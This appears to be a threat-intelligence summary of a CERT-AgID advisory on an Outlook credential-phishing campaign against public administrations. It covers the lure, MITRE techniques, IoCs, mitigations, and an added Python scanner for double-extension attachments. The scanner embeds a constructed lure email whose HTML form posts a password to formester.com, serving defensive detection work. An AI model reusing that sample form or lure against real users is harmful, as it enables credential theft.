Title: Outlook Phishing Campaign Targeting Public Administrations

CERT-AgID warns of a phishing campaign targeting Public Administrations that uses a .pdf.html attachment to deliver a fake Outlook login page and harvest credentials. The campaign abuses the form builder service formester.com to collect submitted Outlook credentials. #MSOutlook #formester

Keypoints

  • Campaign targets Public Administrations with emails impersonating HR or accounting about salary adjustments.
  • Emails include an attachment with a double extension (.pdf.html) that leads to a phishing web page requesting Outlook credentials.
  • Attackers use a legitimate form builder service (formester.com) to receive stolen credentials.
  • Typical red flags: urgent requests, suspicious attachment extension, credential entry requests, generic language, and grammatical errors.
  • CERT-AgID published collected IoCs and provided a downloadable JSON with indicators to assist mitigation.

MITRE Techniques

  • [T1566] Phishing – Fraudulent emails impersonate HR/accounting to trick users into disclosing credentials (‘The attackers, disguising themselves as HR departments or company accounting, are sending fraudulent emails promising salary adjustments… in an attempt to steal login credentials’).
  • [T1204.002] User Execution: Malicious File – A deceptive attachment using a double extension is used to entice opening (‘Attachment: double extension .pdf.html’).
  • [T1566.002] Phishing: Spearphishing Link – The opened attachment presents a phishing page prompting for Outlook credentials (‘The email in question urges recipients to download the attachment to view the details regarding the “salary adjustment”. This is what the phishing page looks like once the attachment is opened:’).
  • [T1567] Exfiltration Over Web Service – Submitted credentials are sent to a third‑party form service (formester.com) to collect stolen data (‘the free service provided by the website formester.com was exploited.’).

Indicators of Compromise

  • [Domain] Phishing infrastructure – formester.com (legitimate form-builder service abused to host the credential-collection form)
  • [File extension / attachment] Malicious attachment pattern – .pdf.html (double-extension attachment used to disguise a webpage)
  • [Email subject] Lure content – “Notice of March pay slip adjustment” (subject line used to prompt download and credential entry)
  • [IOC feed] Published IoC list – https://cert-agid.gov.it/wp-content/uploads/2024/03/outlook_phishing_26-03-2024.json (downloadable JSON with additional indicators)

The phishing emails impersonate HR or accounting and include a deceptive attachment named with a double extension (.pdf.html). When opened, the attachment serves or redirects to an HTML-based phishing page that mimics an Outlook login and requests users to enter credentials. Attackers used a third-party form builder (formester.com) to receive and store submitted usernames and passwords, enabling easy credential collection without hosting bespoke infrastructure.

Detection should focus on attachments with misleading extensions, unexpected requests to enter credentials, and outbound submissions to unfamiliar third-party domains. Incident response includes blocking the malicious domains and IoC URLs, isolating affected accounts, forcing password resets and multifactor authentication enrollment, and reviewing the IoC JSON provided by CERT-AgID for all known hashes, URLs, and indicators to update filters and email protections.

Preventive steps: train staff to recognize urgency and generic language in HR/accounting notices, configure email gateways to flag double-extension attachments and strip or sandbox suspicious HTML attachments, enforce MFA for Outlook accounts, and monitor logs for authentication attempts or credential submissions to external web services.
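As an added example, not code from the CERT-AgID advisory, the following Python scanner applies two of the checks above to a raw email: it flags attachments whose name carries a double extension such as .pdf.html, and flags HTML attachments whose login form would submit a password to a domain outside an assumed allowlist. The sample message, the form URL and the allowlist are constructed for the example.

```python
import email
import re
from email import policy

# Constructed sample (not a real campaign artifact): a lure whose .pdf.html attachment
# carries a credential form that posts to a third-party form-builder service.
SAMPLE_EML = b"""From: hr@example.invalid
Subject: Notice of March pay slip adjustment
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; name="pay_slip_adjustment.pdf.html"
Content-Disposition: attachment; filename="pay_slip_adjustment.pdf.html"

<html><body><form action="https://formester.com/f/constructed-form-id" method="post">
<input name="email"><input type="password" name="passwd"><input type="submit"></form></body></html>
--b1--
"""

DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt"}
WEB_EXTS = {"html", "htm"}
ALLOWED_FORM_DOMAINS = {"login.microsoftonline.com"}  # assumed allowlist for this organisation

def double_extension(filename):
    """True for names like report.pdf.html: a document extension hiding a web page."""
    parts = filename.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[1] in DOC_EXTS and parts[2] in WEB_EXTS

def credential_form_targets(html):
    """Return the external hosts that a password-bearing form in this HTML would submit to."""
    targets = []
    has_password = re.search(r'type=["\']password', html, re.I) is not None
    for action in re.findall(r'<form[^>]*action=["\']([^"\']+)', html, re.I):
        host = re.sub(r"^https?://", "", action).split("/")[0].lower()
        if host and has_password and host not in ALLOWED_FORM_DOMAINS:
            targets.append(host)
    return targets

def scan_message(raw):
    """Return (finding, detail) pairs for every attachment matching the campaign pattern."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if double_extension(name):
            findings.append(("double_extension", name))
        if part.get_content_type() == "text/html":
            for host in credential_form_targets(part.get_content()):
                findings.append(("credential_form_exfil", host))
    return findings
```

Running scan_message over a mail stream at the gateway gives a per-message verdict that can drive quarantining or sandboxing of the attachment before it reaches the user.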

Read more: https://cert-agid.gov.it/news/campagna-di-phishing-outlook-rivolta-alle-pa/